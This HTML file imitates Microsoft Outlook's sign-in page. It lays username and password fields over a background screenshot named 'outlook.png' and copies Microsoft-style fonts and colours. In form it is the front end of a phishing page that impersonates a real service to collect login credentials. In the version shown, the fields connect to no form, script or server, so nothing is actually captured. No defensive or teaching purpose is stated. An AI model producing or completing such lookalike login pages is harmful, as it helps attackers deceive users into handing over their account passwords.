<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Outlook</title>
    <style>
    body{
        background-image: url("outlook.png");
        width: 100%;
        background-repeat: no-repeat;
    }
    #container{
        width: 400px;
        height: 200px;
        background: #fff;
        margin-top: 242px;
        margin-left: 465px;
        position: fixed;

        
    }
    .input{
        border: 0px;
        border-bottom: 0.5px solid rgb(109, 109, 109);
        height: 30px;
        width: 350px;
        font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
        font-weight: 400;
        box-sizing: border-box;
        margin-top: 10px;
        color: #262626;
        text-align: left;
        font-size: .9375rem;
        line-height: 1.25rem;

    }
    .submit{
        background: #1063b1;;
        height: 25px;
        width: 100px;
        padding-top: 5px;
        text-align: center;
        font-family: 'Helvetica Neue',Helvetica,Arial;
        color: #fff;
        font-size: 17px;
        border: 2px solid hsla(0,0%,0%,0);
        border-radius: 2px;
        display: inline-block;
        margin-top: 10px;
        line-height: 1;
        outline: 0;
        overflow: hidden;
        text-align: center;
        font-weight: 400;
        position: fixed;
        margin-left: 250px;
    }
    .section{
        font-size: 12px;
        margin-top: 10px;
    }
    a{
        color: #188fff;
        text-decoration: none;
        
    }
    </style>

</head>
<body>
    
    <div id="container">
    <input type="text" placeholder="Username" class="input"> <br>
    <input type="password" placeholder="Password" class="input"> <br>
            <div class="section">
                No account? <a href="#">Create one!</a>
            <p><a href="#">Sign-in options</a></p>
            </div>
            <div class="submit">Log in</div> 
    
    
    </div>

</div>


</body>
</html>